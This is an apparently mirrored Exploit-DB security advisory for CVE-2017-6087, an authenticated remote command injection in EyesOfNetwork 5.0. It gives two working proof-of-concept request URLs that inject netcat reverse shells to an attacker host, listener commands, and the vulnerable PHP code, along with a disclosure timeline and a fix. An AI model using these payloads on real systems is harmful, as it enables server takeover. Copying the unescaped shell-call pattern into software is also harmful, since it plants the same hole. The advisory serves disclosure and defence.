exploit-db-mirror/platforms/php/webapps/41746.txt
Offensive Security 1f8c35c0c0 DB: 2017-03-28

# [CVE-2017-6087] EON 5.0 Remote Code Execution
## Description
EyesOfNetwork ("EON") is an open-source network monitoring solution.
## Remote Code Execution (authenticated)
The Eonweb code does not correctly filter user-supplied arguments before
passing them to a shell, allowing authenticated users to execute arbitrary
code on the server.
**CVE ID**: CVE-2017-6087
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
### Proof of Concept 1
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.
It is therefore possible to inject a payload like the one in the request
below, which connects back to our handler:
```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```
#### Vulnerable code
The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
    if($value["type"] == true){
        if($key == "owner"){
            $event[$key] = $owner;
        }
        // user-controlled $event[$key] is concatenated into the shell command
        // with no escaping (escapeshellarg() is never applied)
        $ged_command .= "\"".$event[$key]."\" ";
    }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```
Two other functions in this file are also affected by this problem:
* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`
### Proof of Concept 2
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `module` parameter is not correctly filtered before it is used by
the `exec()` function.
Again, we inject a payload that connects back to our handler:
```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```
#### Vulnerable code
In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:
```
# Check optional module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {
    # $_GET["module"] is concatenated straight into the command line
    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
    # Redirect to module page if rpm installed
    if($module!=0) { header('Location: '.$_GET["link"].''); }
}
```
## Timeline (dd/mm/yyyy)
* 01/10/2016 : Initial discovery.
* 09/10/2016 : First contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor acknowledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.
* 14/03/2017 : Public disclosure.
Thank you to EON for the fast response.
## Solution
Update to version 5.1.
## Affected versions
* Version <= 5.0
## Credits
* Nicolas SERRA <n.serra@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG: 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
Website: https://sysdream.com/
Twitter: @sysdream